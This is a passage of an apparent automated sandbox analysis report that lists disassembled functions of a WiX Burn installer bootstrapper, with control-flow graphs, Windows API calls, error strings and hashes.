call a04c86 836->842 843 a053f4-a053f9 836->843 837->838 844 a05494 837->844 838->725 839->838 842->838 851 a0541c 842->851 843->842 844->825 846->829 850->831 851->835
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A05217
                                                                                                                                                                • Part of subcall function 00A404F8: InitializeCriticalSection.KERNEL32(00A6B5FC,?,00A05223,00000000,?,?,?,?,?,?), ref: 00A4050F
                                                                                                                                                                • Part of subcall function 00A0120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00A0523F,00000000,?), ref: 00A01248
                                                                                                                                                                • Part of subcall function 00A0120A: GetLastError.KERNEL32(?,?,?,00A0523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00A01252
                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00A05285
                                                                                                                                                                • Part of subcall function 00A40E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00A40E28
                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00A05317
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00A05321
                                                                                                                                                              • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A0558E
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to initialize COM., xrefs: 00A05291
                                                                                                                                                              • 3.11.1.2318, xrefs: 00A05384
                                                                                                                                                              • engine.cpp, xrefs: 00A05345
                                                                                                                                                              • Failed to get OS info., xrefs: 00A0534F
                                                                                                                                                              • Failed to run per-machine mode., xrefs: 00A0546C
                                                                                                                                                              • Failed to run untrusted mode., xrefs: 00A054B6
                                                                                                                                                              • Failed to initialize core., xrefs: 00A053C3
                                                                                                                                                              • Failed to run embedded mode., xrefs: 00A05444
                                                                                                                                                              • Failed to initialize Cryputil., xrefs: 00A052A6
                                                                                                                                                              • Failed to initialize Regutil., xrefs: 00A052C9
                                                                                                                                                              • Invalid run mode., xrefs: 00A053F9
                                                                                                                                                              • Failed to initialize XML util., xrefs: 00A052F9
                                                                                                                                                              • Failed to run RunOnce mode., xrefs: 00A0541C
                                                                                                                                                              • Failed to run per-user mode., xrefs: 00A05494
                                                                                                                                                              • Failed to initialize Wiutil., xrefs: 00A052E1
                                                                                                                                                              • Failed to initialize engine state., xrefs: 00A0526C
                                                                                                                                                              • Failed to parse command line., xrefs: 00A05245
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                                                                                                              • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                                                                                                                              • API String ID: 3262001429-510904028
                                                                                                                                                              • Opcode ID: 34f1065a5a733920edd0c00a26c3fa28a026efd8221de6f652ae1f8f9bf158c7
                                                                                                                                                              • Instruction ID: f77c64e80a2e4191b68fff62b0a234b218c7e6d8d644c4ff1ecf4d838aa6f801
                                                                                                                                                              • Opcode Fuzzy Hash: 34f1065a5a733920edd0c00a26c3fa28a026efd8221de6f652ae1f8f9bf158c7
                                                                                                                                                              • Instruction Fuzzy Hash: 8DB1A476D4062DABDB319B74ED46BEE76B5BF48310F0401A5F908A6281DB71DE80CF91
                                                                                                                                                              Function 00A1752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 852 a1752a-a1756f call a2f8e0 call a0762c 857 a17571-a17576 852->857 858 a1757b-a1758c call a0c407 852->858 859 a17814-a1781b call a40237 857->859 864 a17598-a175a9 call a0c26e 858->864 865 a1758e-a17593 858->865 866 a1781c-a17821 859->866 874 a175b5-a175ca call a0c4c8 864->874 875 a175ab-a175b0 864->875 865->859 868 a17823-a17824 call a45636 866->868 869 a17829-a1782d 866->869 868->869 872 a17837-a1783c 869->872 873 a1782f-a17832 call a45636 869->873 877 a17844-a17851 call a0c1bb 872->877 878 a1783e-a1783f call a45636 872->878 873->872 884 a175d6-a175e6 call a2c001 874->884 885 a175cc-a175d1 874->885 875->859 886 a17853-a17856 call a45636 877->886 887 a1785b-a1785f 877->887 878->877 893 a175f2-a17665 call a15c33 884->893 894 a175e8-a175ed 884->894 885->859 886->887 891 a17861-a17864 call a45636 887->891 892 a17869-a1786d 887->892 891->892 896 a17877-a1787f 892->896 897 a1786f-a17872 call a03a16 892->897 901 a17671-a17676 893->901 902 a17667-a1766c 893->902 894->859 897->896 903 a17678 901->903 904 a1767d-a176b4 call a05602 GetCurrentProcess call a40879 call a0827b 901->904 902->859 903->904 911 a176b6 904->911 912 a176ce-a176e5 call a0827b 904->912 913 a176bb-a176c9 call a40237 911->913 918 a176e7-a176ec 912->918 919 a176ee-a176f3 912->919 913->866 918->913 920 a176f5-a17707 call a0821f 919->920 921 a1774f-a17754 919->921 932 a17713-a17723 call a03436 920->932 933 a17709-a1770e 920->933 922 a17774-a1777d 921->922 923 a17756-a17768 call a0821f 921->923 926 a17789-a1779d call a1a50c 922->926 927 a1777f-a17782 922->927 923->922 937 a1776a-a1776f 923->937 939 a177a6 926->939 940 a1779f-a177a4 926->940 927->926 931 a17784-a17787 927->931 931->926 934 a177ac-a177af 931->934 943 a17725-a1772a 932->943 944 a1772f-a17743 call a0821f 932->944 933->859 941 a177b1-a177b4 934->941 942 a177b6-a177cc call a0d5a0 934->942 937->859 939->934 940->859 941->866 941->942 949 a177d5-a177e4 call a0cbc5 942->949 950 a177ce-a177d3 942->950 943->859 944->921 951 a17745-a1774a 944->951 953 a177e9-a177ed 949->953 950->859 951->859 954 a177f6-a1780d call a0c8e6 953->954 955 a177ef-a177f4 953->955 954->866 958 a1780f 954->958 955->859 958->859
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to set source process path variable., xrefs: 00A17709
                                                                                                                                                              • Failed to set source process folder variable., xrefs: 00A17745
                                                                                                                                                              • WixBundleSourceProcessFolder, xrefs: 00A17734
                                                                                                                                                              • Failed to open attached UX container., xrefs: 00A1758E
                                                                                                                                                              • Failed to open manifest stream., xrefs: 00A175AB
                                                                                                                                                              • WixBundleElevated, xrefs: 00A176A5, 00A176B6
                                                                                                                                                              • Failed to get manifest stream from container., xrefs: 00A175CC
                                                                                                                                                              • Failed to overwrite the %ls built-in variable., xrefs: 00A176BB
                                                                                                                                                              • Failed to extract bootstrapper application payloads., xrefs: 00A177EF
                                                                                                                                                              • Failed to initialize internal cache functionality., xrefs: 00A1779F
                                                                                                                                                              • Failed to load catalog files., xrefs: 00A1780F
                                                                                                                                                              • WixBundleOriginalSource, xrefs: 00A17759
                                                                                                                                                              • Failed to initialize variables., xrefs: 00A17571
                                                                                                                                                              • Failed to set original source variable., xrefs: 00A1776A
                                                                                                                                                              • WixBundleUILevel, xrefs: 00A176D6, 00A176E7
                                                                                                                                                              • Failed to get source process folder from path., xrefs: 00A17725
                                                                                                                                                              • WixBundleSourceProcessPath, xrefs: 00A176F8
                                                                                                                                                              • Failed to load manifest., xrefs: 00A175E8
                                                                                                                                                              • Failed to get unique temporary folder for bootstrapper application., xrefs: 00A177CE
                                                                                                                                                              • Failed to parse command line., xrefs: 00A17667
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalInitializeSection
                                                                                                                                                              • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                                                                                                                              • API String ID: 32694325-1564579409
                                                                                                                                                              • Opcode ID: 5a87a5e2661f31c79016c2ce5905e894e18973cd20ddf7fef010f892829e83eb
                                                                                                                                                              • Instruction ID: c063115c546f90d4d87223edbaba368bd0d0c9fc2b614387fdfc4d27711d7488
                                                                                                                                                              • Opcode Fuzzy Hash: 5a87a5e2661f31c79016c2ce5905e894e18973cd20ddf7fef010f892829e83eb
                                                                                                                                                              • Instruction Fuzzy Hash: 2EA19572E4461ABBDB129BA4CD85EEEB77CBB04710F001666F915E7181D770E984CBE0
                                                                                                                                                              Function 00A0762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1064 a0762c-a07edf InitializeCriticalSection 1065 a07ee2-a07f06 call a05623 1064->1065 1068 a07f13-a07f24 call a40237 1065->1068 1069 a07f08-a07f0f 1065->1069 1072 a07f27-a07f39 call a2e06f 1068->1072 1069->1065 1070 a07f11 1069->1070 1070->1072
                                                                                                                                                              APIs
                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00A1756B,00A053BD,00000000,00A05445), ref: 00A0764C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalInitializeSection
                                                                                                                                                              • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                                                                                                                              • API String ID: 32694325-3635313340
                                                                                                                                                              • Opcode ID: 9e5bd21b61f03ae87ffc39476ae8b8bf5ebd6f0ab8def05e8efdad58efbd319d
                                                                                                                                                              • Instruction ID: 997925e1d9b40d7d552c83208688f3ad4a49a8b2f18a1aa60741d3423e52062b
                                                                                                                                                              • Opcode Fuzzy Hash: 9e5bd21b61f03ae87ffc39476ae8b8bf5ebd6f0ab8def05e8efdad58efbd319d
                                                                                                                                                              • Instruction Fuzzy Hash: 30325CB4C126299FDBA5CF5AD9887CDFAB4BB49314F5081EED20CA6250C7B01B88CF45
                                                                                                                                                              Function 00A182BA Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 153COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1076 a182ba-a18303 call a2f8e0 1079 a18309-a18329 GetCurrentProcess call a40879 1076->1079 1080 a1847c-a18489 call a02195 1076->1080 1085 a183b7-a183c5 GetTempPathW 1079->1085 1086 a1832f-a1833e GetWindowsDirectoryW 1079->1086 1087 a18498-a184aa call a2e06f 1080->1087 1088 a1848b 1080->1088 1089 a183c7-a183d1 GetLastError 1085->1089 1090 a183ff-a18411 UuidCreate 1085->1090 1091 a18340-a1834a GetLastError 1086->1091 1092 a18378-a18389 call a0337f 1086->1092 1093 a18490-a18497 call a40237 1088->1093 1095 a183d3-a183dc 1089->1095 1096 a183de 1089->1096 1100 a18413-a18418 1090->1100 1101 a1841a-a1842f StringFromGUID2 1090->1101 1097 a18357 1091->1097 1098 a1834c-a18355 1091->1098 1115 a18395-a183ab call a036a3 1092->1115 1116 a1838b-a18390 1092->1116 1093->1087 1095->1096 1104 a183e0 1096->1104 1105 a183e5-a183fa call a03821 1096->1105 1106 a18359 1097->1106 1107 a1835e-a18373 call a03821 1097->1107 1098->1097 1100->1093 1110 a18431-a1844b call a03821 1101->1110 1111 a1844d-a1846e call a01f13 1101->1111 1104->1105 1105->1093 1106->1107 1107->1093 1110->1093 1124 a18470-a18475 1111->1124 1125 a18477 1111->1125 1115->1090 1126 a183ad-a183b2 1115->1126 1116->1093 1124->1093 1125->1080 1126->1093
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00A05489), ref: 00A18310
                                                                                                                                                                • Part of subcall function 00A40879: OpenProcessToken.ADVAPI32(?,00000008,?,00A053BD,00000000,?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A40897
                                                                                                                                                                • Part of subcall function 00A40879: GetLastError.KERNEL32(?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A408A1
                                                                                                                                                                • Part of subcall function 00A40879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A4092B
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00A18336
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A18340
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 00A183BD
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A183C7
                                                                                                                                                              • UuidCreate.RPCRT4(?), ref: 00A18406
                                                                                                                                                              Strings
                                                                                                                                                              • cache.cpp, xrefs: 00A18364, 00A183EB, 00A1843C
                                                                                                                                                              • Failed to get temp path for working folder., xrefs: 00A183F5
                                                                                                                                                              • Failed to concat Temp directory on windows path for working folder., xrefs: 00A183AD
                                                                                                                                                              • Failed to copy working folder path., xrefs: 00A1848B
                                                                                                                                                              • Failed to append bundle id on to temp path for working folder., xrefs: 00A18470
                                                                                                                                                              • Failed to get windows path for working folder., xrefs: 00A1836E
                                                                                                                                                              • Failed to ensure windows path for working folder ended in backslash., xrefs: 00A1838B
                                                                                                                                                              • Temp\, xrefs: 00A18395
                                                                                                                                                              • %ls%ls\, xrefs: 00A18458
                                                                                                                                                              • Failed to create working folder guid., xrefs: 00A18413
                                                                                                                                                              • Failed to convert working folder guid into string., xrefs: 00A18446
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                                                              • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                                                                                                              • API String ID: 266130487-819636856
                                                                                                                                                              • Opcode ID: 8ab2a6a5ac980a4c6aff989e4ea4900c3170276ba539148f65fb4b27a9f295b6
                                                                                                                                                              • Instruction ID: 19d7b431df87e9fd3d5096b5f7df2bb600e720619314b7fdd6b25707cd81f9a4
                                                                                                                                                              • Opcode Fuzzy Hash: 8ab2a6a5ac980a4c6aff989e4ea4900c3170276ba539148f65fb4b27a9f295b6
                                                                                                                                                              • Instruction Fuzzy Hash: 0B41C236E41629B7DB20D6E49D0AFDA7368BB54B11F108561BE04FB180EE78DD4886E1
                                                                                                                                                              Function 00A210FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1127 a210fb-a21127 CoInitializeEx 1128 a2113b-a21186 call a3f483 1127->1128 1129 a21129-a21136 call a40237 1127->1129 1135 a211b0-a211d2 call a3f4a4 1128->1135 1136 a21188-a211ab call a03821 call a40237 1128->1136 1134 a2139e-a213b0 call a2e06f 1129->1134 1144 a211d8-a211e0 1135->1144 1145 a2128c-a21297 SetEvent 1135->1145 1155 a21397-a21398 CoUninitialize 1136->1155 1149 a211e6-a211ec 1144->1149 1150 a2138f-a21392 call a3f4b4 1144->1150 1146 a212d6-a212e4 WaitForSingleObject 1145->1146 1147 a21299-a212a3 GetLastError 1145->1147 1151 a212e6-a212f0 GetLastError 1146->1151 1152 a21318-a21323 ResetEvent 1146->1152 1153 a212b0 1147->1153 1154 a212a5-a212ae 1147->1154 1149->1150 1157 a211f2-a211fa 1149->1157 1150->1155 1158 a212f2-a212fb 1151->1158 1159 a212fd 1151->1159 1160 a21325-a2132f GetLastError 1152->1160 1161 a2135a-a21360 1152->1161 1162 a212b2 1153->1162 1163 a212b4-a212c4 call a03821 1153->1163 1154->1153 1155->1134 1164 a21274-a21287 call a40237 1157->1164 1165 a211fc-a211fe 1157->1165 1158->1159 1169 a21301-a21316 call a03821 1159->1169 1170 a212ff 1159->1170 1171 a21331-a2133a 1160->1171 1172 a2133c 1160->1172 1166 a21362-a21365 1161->1166 1167 a2138a 1161->1167 1162->1163 1202 a212c9-a212d1 call a40237 1163->1202 1164->1150 1174 a21200 1165->1174 1175 a21211-a21214 1165->1175 1178 a21386-a21388 1166->1178 1179 a21367-a21381 call a03821 1166->1179 1167->1150 1169->1202 1170->1169 1171->1172 1184 a21340-a21355 call a03821 1172->1184 1185 a2133e 1172->1185 1176 a21202-a21204 1174->1176 1177 a21206-a2120f 1174->1177 1180 a21216 1175->1180 1181 a2126e 1175->1181 1187 a21270-a21272 1176->1187 1177->1187 1178->1150 1179->1202 1189 a21232-a21237 1180->1189 1190 a21263-a21268 1180->1190 1191 a21240-a21245 1180->1191 1192 a21247-a2124c 1180->1192 1193 a21224-a21229 1180->1193 1194 a21255-a2125a 1180->1194 1195 a2126a-a2126c 1180->1195 1196 a2122b-a21230 1180->1196 1197 a21239-a2123e 1180->1197 1198 a2124e-a21253 1180->1198 1199 a2125c-a21261 1180->1199 1200 a2121d-a21222 1180->1200 1181->1187 1184->1202 1185->1184 1187->1145 1187->1164 1189->1164 1190->1164 1191->1164 1192->1164 1193->1164 1194->1164 1195->1164 1196->1164 1197->1164 1198->1164 1199->1164 1200->1164 1202->1150
                                                                                                                                                              APIs
                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000), ref: 00A2111D
                                                                                                                                                              • CoUninitialize.COMBASE ref: 00A21398
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                                                              • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                              • API String ID: 3442037557-1168358783
                                                                                                                                                              • Opcode ID: 44b82ea04f9ce36e902fb29acf2cde1684ca08af3714d242040bb66f3803a84b
                                                                                                                                                              • Instruction ID: 99f2f697bcc6ad2bdb7c6c89c21a89dc466e87084b3b31914d5a75978fb83621
                                                                                                                                                              • Opcode Fuzzy Hash: 44b82ea04f9ce36e902fb29acf2cde1684ca08af3714d242040bb66f3803a84b
                                                                                                                                                              • Instruction Fuzzy Hash: 0851473BE40271E7CB2097ACAD05EEB3665BB71760B224775BD01FF291D6758C0192E2
                                                                                                                                                              Function 00A042D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158stringCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1208 a042d7-a0432e InitializeCriticalSection * 2 call a14d05 * 2 1213 a04452-a0445c call a0b48b 1208->1213 1214 a04334 1208->1214 1219 a04461-a04465 1213->1219 1215 a0433a-a04347 1214->1215 1217 a04445-a0444c 1215->1217 1218 a0434d-a04379 lstrlenW * 2 CompareStringW 1215->1218 1217->1213 1217->1215 1220 a043cb-a043f7 lstrlenW * 2 CompareStringW 1218->1220 1221 a0437b-a0439e lstrlenW 1218->1221 1222 a04474-a0447c 1219->1222 1223 a04467-a04473 call a40237 1219->1223 1220->1217 1224 a043f9-a0441c lstrlenW 1220->1224 1225 a043a4-a043a9 1221->1225 1226 a0448a-a0449f call a03821 1221->1226 1223->1222 1229 a04422-a04427 1224->1229 1230 a044b6-a044d0 call a03821 1224->1230 1225->1226 1231 a043af-a043bf call a029ce 1225->1231 1237 a044a4-a044ab 1226->1237 1229->1230 1234 a0442d-a0443d call a029ce 1229->1234 1230->1237 1241 a043c5 1231->1241 1242 a0447f-a04488 1231->1242 1234->1242 1246 a0443f 1234->1246 1243 a044ac-a044b4 call a40237 1237->1243 1241->1220 1242->1243 1243->1222 1246->1217
                                                                                                                                                              APIs
                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00A05266,?,?,00000000,?,?), ref: 00A04303
                                                                                                                                                              • InitializeCriticalSection.KERNEL32(000000D0,?,?,00A05266,?,?,00000000,?,?), ref: 00A0430C
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00A05266,?,?,00000000,?,?), ref: 00A04352
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00A05266,?,?,00000000,?,?), ref: 00A0435C
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00A05266,?,?,00000000,?,?), ref: 00A04370
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00A05266,?,?,00000000,?,?), ref: 00A04380
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00A05266,?,?,00000000,?,?), ref: 00A043D0
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00A05266,?,?,00000000,?,?), ref: 00A043DA
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00A05266,?,?,00000000,?,?), ref: 00A043EE
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00A05266,?,?,00000000,?,?), ref: 00A043FE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                                                              • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                              • API String ID: 3039292287-3209860532
                                                                                                                                                              • Opcode ID: a513954f7a847a85b30d893992019082a2b58d728a4a59cd494df2f53e8df219
                                                                                                                                                              • Instruction ID: 23899b6a9b61354e2b27daa732b75e60c5f1e081ad5ee6c80d10ee116fb8d0fe
                                                                                                                                                              • Opcode Fuzzy Hash: a513954f7a847a85b30d893992019082a2b58d728a4a59cd494df2f53e8df219
                                                                                                                                                              • Instruction Fuzzy Hash: 4B51B0B5A50219BFCB20DBA8EC86F9A776CFF48760F104116F714A72D0D7B1E950CAA0
                                                                                                                                                              Function 00A1E7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137registryCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1248 a1e7b4-a1e7f1 1249 a1e813-a1e834 RegisterClassW 1248->1249 1250 a1e7f3-a1e807 TlsSetValue 1248->1250 1252 a1e836-a1e840 GetLastError 1249->1252 1253 a1e86e-a1e8a5 CreateWindowExW 1249->1253 1250->1249 1251 a1e809-a1e80e 1250->1251 1256 a1e93d-a1e953 UnregisterClassW 1251->1256 1257 a1e842-a1e84b 1252->1257 1258 a1e84d 1252->1258 1254 a1e8a7-a1e8b1 GetLastError 1253->1254 1255 a1e8dc-a1e8f0 SetEvent 1253->1255 1261 a1e8b3-a1e8bc 1254->1261 1262 a1e8be 1254->1262 1263 a1e91c-a1e927 GetMessageW 1255->1263 1257->1258 1259 a1e854-a1e869 call a03821 1258->1259 1260 a1e84f 1258->1260 1274 a1e935-a1e93c call a40237 1259->1274 1260->1259 1261->1262 1267 a1e8c0 1262->1267 1268 a1e8c5-a1e8da call a03821 1262->1268 1264 a1e8f2-a1e8f5 1263->1264 1265 a1e929 1263->1265 1271 a1e8f7-a1e906 IsDialogMessageW 1264->1271 1272 a1e92b-a1e930 1264->1272 1265->1256 1267->1268 1268->1274 1271->1263 1273 a1e908-a1e916 TranslateMessage DispatchMessageW 1271->1273 1272->1274 1273->1263 1274->1256
                                                                                                                                                              APIs
                                                                                                                                                              • TlsSetValue.KERNEL32(?,?), ref: 00A1E7FF
                                                                                                                                                              • RegisterClassW.USER32(?), ref: 00A1E82B
